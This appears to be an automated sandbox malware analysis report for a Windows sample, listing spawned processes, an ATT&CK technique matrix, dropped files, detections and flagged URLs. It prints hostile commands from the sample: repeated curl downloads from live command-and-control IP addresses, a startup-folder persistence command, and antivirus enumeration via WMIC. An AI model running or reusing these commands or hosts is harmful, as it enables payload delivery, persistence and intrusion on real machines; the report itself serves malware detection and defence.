Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & echo url="c:\users\user\appdata\local\innosphere dynamics\innosphere.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & exit
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & echo url="c:\users\user\appdata\local\innosphere dynamics\innosphere.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & exitJump to behavior
Source: Finish.com, 0000000A.00000003.2078982838.0000000003A70000.00000004.00000800.00020000.00000000.sdmp, Finish.com, 0000000A.00000000.2072228997.0000000000613000.00000002.00000001.01000000.00000007.sdmp, InnoSphere.scr, 00000010.00000000.2231027932.0000000000EF3000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,52_2_0041713F
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,52_2_00416AF5
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,52_2_0041BC50
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: EnumSystemLocalesA,52_2_00417068
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: EnumSystemLocalesA,52_2_00416CCA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,52_2_00411CF0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,52_2_0041709F
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,52_2_00411CB0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,52_2_00416D51
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoW,WideCharToMultiByte,52_2_0041BD13
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,52_2_004171C4
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,52_2_0041725C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: EnumSystemLocalesA,52_2_00416F55
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,52_2_0041BB3D
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,MultiByteToWideChar,52_2_0041BBFA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,52_2_00416FAB
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_00413F9E GetLocalTime,GetSystemTime,GetTimeZoneInformation,52_2_00413F9E
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 52_2_004194BD GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,52_2_004194BD
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts241
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
11
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
1
Access Token Manipulation
21
Obfuscated Files or Information
LSASS Memory3
File and Directory Discovery
Remote Desktop Protocol11
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Registry Run Keys / Startup Folder
12
Process Injection
1
Software Packing
Security Account Manager47
System Information Discovery
SMB/Windows Admin Shares1
Clipboard Data
3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
Registry Run Keys / Startup Folder
1
DLL Side-Loading
NTDS241
Security Software Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script121
Masquerading
LSA Secrets13
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
Virtualization/Sandbox Evasion
Cached Domain Credentials3
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Access Token Manipulation
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
Process Injection
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561834 Sample: file.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 124 bg.microsoft.map.fastly.net 2->124 126 GyxNFpxuLvDE.GyxNFpxuLvDE 2->126 128 EaUMrTLEnhJoi.EaUMrTLEnhJoi 2->128 138 Suricata IDS alerts for network traffic 2->138 140 Antivirus detection for URL or domain 2->140 142 Sigma detected: Copy itself to suspicious location via type command 2->142 144 4 other signatures 2->144 11 file.exe 18 2->11         started        15 wscript.exe 2->15         started        signatures3 process4 file5 106 C:\Users\user\AppData\Local\Temp\Rocky, PE32 11->106 dropped 108 C:\Users\user\AppData\Local\Temp\Vermont, data 11->108 dropped 110 C:\Users\user\AppData\Local\Temp\Vatican, data 11->110 dropped 112 5 other malicious files 11->112 dropped 158 Writes many files with high entropy 11->158 17 cmd.exe 3 11->17         started        21 Conhost.exe 11->21         started        160 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->160 23 InnoSphere.scr 15->23         started        signatures6 process7 file8 84 C:\Users\user\AppData\Local\...\Finish.com, PE32 17->84 dropped 134 Drops PE files with a suspicious file extension 17->134 136 Writes many files with high entropy 17->136 25 Finish.com 23 17->25         started        29 cmd.exe 2 17->29         started        31 conhost.exe 17->31         started        33 8 other processes 17->33 signatures9 process10 file11 96 C:\Users\user\AppData\...\RevenueDevices.exe, PE32 25->96 dropped 98 C:\Users\user\AppData\...\InnoSphere.scr, PE32 25->98 dropped 100 C:\Users\user\AppData\Roaming\...\xhwq.zip, Zip 25->100 dropped 104 3 other files (2 malicious) 25->104 dropped 154 Drops PE files with a suspicious file extension 25->154 156 Writes many files with high entropy 25->156 35 RevenueDevices.exe 25->35         started        39 cmd.exe 25->39         started        41 cmd.exe 25->41         started        43 25 other processes 25->43 102 C:\Users\user\AppData\Local\Temp\768032behaviorgraph, data 29->102 dropped signatures12 process13 file14 86 C:\Users\user\AppData\Local\Temp\Showcase, data 35->86 dropped 88 C:\Users\user\AppData\Local\Temp\Shepherd, data 35->88 dropped 90 C:\Users\user\AppData\Local\Temp\Samples, data 35->90 dropped 94 5 other malicious files 35->94 dropped 146 Multi AV Scanner detection for dropped file 35->146 148 Writes many files with high entropy 35->148 45 cmd.exe 35->45         started        48 azvw.exe 39->48         started        50 conhost.exe 39->50         started        52 systeminfo.exe 41->52         started        62 2 other processes 41->62 92 C:\Users\user\AppData\...\InnoSphere.url, MS 43->92 dropped 55 curl.exe 43->55         started        58 curl.exe 43->58         started        60 curl.exe 43->60         started        64 47 other processes 43->64 signatures15 process16 dnsIp17 114 C:\Users\user\AppData\Local\...ither.pif, PE32 45->114 dropped 66 conhost.exe 45->66         started        116 C:\Users\user\AppData\...\PsInfo64.exe, PE32+ 48->116 dropped 118 C:\Users\user\AppData\Roaming\...\PsInfo.exe, PE32 48->118 dropped 120 C:\Users\user\AppData\Roaming\...\7zxa.dll, PE32 48->120 dropped 122 4 other files (2 malicious) 48->122 dropped 150 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 52->150 152 Writes or reads registry keys via WMI 52->152 68 WmiPrvSE.exe 52->68         started        78 2 other processes 52->78 130 178.215.224.74, 49793, 49798, 49800 LVLT-10753US Germany 55->130 70 Conhost.exe 58->70         started        72 Conhost.exe 58->72         started        80 2 other processes 60->80 74 Conhost.exe 62->74         started        132 178.215.224.252, 49732, 50023, 80 LVLT-10753US Germany 64->132 76 Conhost.exe 64->76         started        82 4 other processes 64->82 file18 signatures19 process20

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.exe11%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr0%ReversingLabs
C:\Users\user\AppData\Local\Temp\303482\Either.pif5%ReversingLabs
C:\Users\user\AppData\Local\Temp\768032\Finish.com0%ReversingLabs
C:\Users\user\AppData\Local\Temp\RevenueDevices.exe62%ReversingLabsWin32.Trojan.Ramses
C:\Users\user\AppData\Local\Temp\Rocky0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\7za.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\7za.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe5%ReversingLabs
C:\Users\user\AppData\Roaming\DolphinDumps\zip.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=d460800e784d2ac37a5620f6b348df6f*6&jwvs=4CA966315CCC70F4BEF0FE322EDE46100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=5100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?gi100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=7100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=8100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=79019141f392e1d4f8c60697fd9f5a0e*2&jwvs=4CA966315CCC70F4BEF0FE322EDE46100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=6h100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=6100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=4CA966315CCC70F4BEF0FE322EDE46100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php100%Avira URL Cloudmalware
ftp://ftp.info-zip.org/pub/infozip0%Avira URL Cloudsafe
http://178.215.224.74/v10/ukyh.NNAME=ConsoleSh100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=4CA966315CCC70F4BEF0FE322EDE46&bsxa=1100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=60%100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=6T100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=6Q100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=31100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true100%Avira URL Cloudmalware
http://178.215.224.252/v10/ukyh100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=7wk0100%Avira URL Cloudmalware
http://178.215.224.252/v10/ukyh.php?jspo=6100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?uvyw=2100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=33&jwvs=4CA966315CCC70F4BEF0FE322EDE46100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.%100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?uvyw=6100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=6c100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=4CA966315CCC70F4BEF0FE322EDE46100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldml100%Avira URL Cloudmalware
http://178.215.224.74/v10/ukyh.c100%Avira URL Cloudmalware
